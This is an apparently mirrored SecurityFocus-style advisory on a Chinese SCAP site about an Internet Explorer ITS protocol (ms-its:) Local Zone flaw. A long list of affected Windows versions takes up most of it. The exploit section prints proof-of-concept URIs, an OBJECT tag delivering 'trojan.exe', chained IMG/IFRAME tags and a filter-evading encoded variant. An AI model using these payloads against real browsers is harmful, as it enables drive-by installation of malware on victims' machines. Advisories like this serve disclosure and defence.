- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
Microsoft Internet Explorer 5.0.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows 98SE
+ Microsoft Windows ME
+ Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
+ Microsoft

- 漏洞讨论

Microsoft Internet Explorer has been reported prone to a vulnerability that may permit hostile content to be interpreted in the Local Zone.

The issue may be exploited via the ITS (InfoTech Storage) Protocol URI handler. It is possible to use this protocol to force a browser into the Local Zone by redirecting into a non-existent MHTML file (using other known vulnerabilities). In this manner, it may be possible to reference hostile content to be executed in the Local Zone, such as a malicious CHM file. The issue, in combination with other vulnerabilities, is exploitable to provide for automatic delivery and execution of an arbitrary executable. This would occur when malicious web content is rendered in Internet Explorer.

Outlook products and other components that use Internet Explorer to render HTML content also present possible attack vectors for this issue.

It should be noted that there are multiple ways to invoke the protocol handler, such as through its:, ms-its:, ms-itss: and mk:@MSITStore: URIs. It has also been reported that web browsers other than Internet Explorer may also invoke the operating system URI handlers for the ITS protocol.

It has been reported that this vulnerability is actively being exploited as an infection vector for malicious code that has been dubbed Trojan.Ibiza.

**NOTE: Microsoft has released a cumulative update for Outlook Express (MS04-013) to address the MHTML-related vulnerabilities that are commonly exploited in tandem with this issue. While MS04-013 lists the same CVE candidate name as this BID, it is not currently known if this update also addresses the distinct ITS Protocol vulnerability. However, users are advised to apply the available updates, as they will reduce exposure to existing exploits that rely on the MHTML issues to exploit this or other vulnerabilities. It should be noted that if this individual vulnerability has not been addressed by the update, there may still potentially be other attack vectors which do not rely on the MHTML issues.

**Update: Symantec has observed targeted attacks "in the wild" with confirmation that systems were compromised as a result. Users are advised to ensure that the patch has been installed and take appropriate measures to avoid future attacks using potentially unpublished and unpatched vulnerabilities. This includes disabling scripting and active content by default wherever possible (use the MSIE Zone functionality to permit scripting for content from trusted domains). Avoid visiting suspicious links, such as those included in e-mail/instant messages or other untrustworthy communications. Disable HTML e-mail, if possible.

- 漏洞利用

**UPDATE: Symantec has determined that this vulnerability is being exploited "in the wild", in what appear to be targeted attacks.

The following proof-of-concept has been supplied:

ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm

The following example demonstrates the exploitation of this issue:

The attacker would create a script (ie; launch.html) containing a CLASSID exploit as a CHM such as:
&amp;lt;OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'&gt;

The attacker would then utilize another script tag to execute the launch.html such as:
&lt;IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'&gt;&lt;IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'&gt;&lt;IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'&gt;&lt;IFRAME
SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'&gt;

Additional proof-of-concepts have been published by http-equiv and Jelmer that demonstrate different payloads:
http://www.malware.com/junk-de-lux.html
http://ip3e83566f.speed.planet.nl/security/newone/exploit.htm

Additional proof-of-concepts were provided in the "IE ms-its: and mk:@MSITStore: vulnerability" BugTraq post by Roozbeh Afrasiabi.

Jelmer also released the following proof-of-concept example which may potentially bypass some filters due to using encoded characters in the exploit string:

&amp;#109;s-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm

This issue is known to be exploited in the wild.

- 解决方案

This specific issue may be addressed by Microsoft Security Bulletin MS04-013, though this has not been confirmed. Users are still advised the install the applicable patches from MS04-013 as it will help to mitigate existing exploits for this issue which rely on the MHTML vulnerabilities (BIDs 9105 and 9107).

---
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站